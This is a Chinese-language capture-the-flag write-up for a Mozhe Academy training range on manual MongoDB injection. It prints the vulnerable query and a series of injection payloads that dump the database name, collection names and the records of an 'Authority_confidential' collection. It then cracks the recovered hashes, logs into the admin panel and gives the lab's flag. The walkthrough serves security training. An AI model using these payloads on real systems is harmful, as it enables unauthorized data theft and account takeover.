MongoDB 是⼀个基于分布式文件存储的数据库。由 C++ 语言编写。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案
MongoDB 是⼀个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最富,最像关系数据库的。MongoDB 将数据存储为⼀个文档,数据结构由键值(key=>value)对组成
data:image/s3,"s3://crabby-images/1e01e/1e01e60f9ebc771f274a2b02438bb30fa9c3260a" alt=""
靶场地址:SQL手工注入漏洞测试(MongoDB数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养
第一步:
给出的源码...可以看到数据库查询的语句如下..构造回显测试..
var data= db.notice.findOne({'id':'$id'});return data;
传⼊的数据是$id。注意到可以通过闭合 "({'" 来构造payload 因为返回的数据是$obj['retval']['title']与$obj['retval']['content'],可以尝试return({title:'1',content:'2'})来构造回显测试
id=1'});return({title:'1',content:'2
data:image/s3,"s3://crabby-images/a970f/a970fb9db69475854a4d4a2facff6471d895ee54" alt=""
第二步:查询数据库库名
获取数据库名称:
id=1'});return({title:tojson(db),content:'2
data:image/s3,"s3://crabby-images/22412/2241225c72a842ae2954e2af720df2617797db18" alt=""
第三步:查询数据库表名
id=1'});return({title:tojson(db.getCollectionNames()),content:'2
data:image/s3,"s3://crabby-images/d601b/d601b675bec7cb06034863f9ae54dcd8f4b8ed94" alt=""
第四步:查询数据库字段值
id=1'});return({title:tojson(db.Authority_confidential.find()[0]),content:'2
data:image/s3,"s3://crabby-images/ef40a/ef40a49f36a95f2788e4a0ca9fe56a9320d49998" alt=""
id=1'});return({title:tojson(db.Authority_confidential.find()[1]),content:'2
data:image/s3,"s3://crabby-images/a650d/a650d855f16463971c7508bb1903e7169d59ef19" alt=""
第五步:cmd5解密
第六步:登录后台
data:image/s3,"s3://crabby-images/fa037/fa037c104d0dc33d67ba464cd7a2a7d1a03d24d4" alt=""
data:image/s3,"s3://crabby-images/b9602/b96028164aa250246b1d941c38540e478bf9d68e" alt=""
KEY:mozhe82a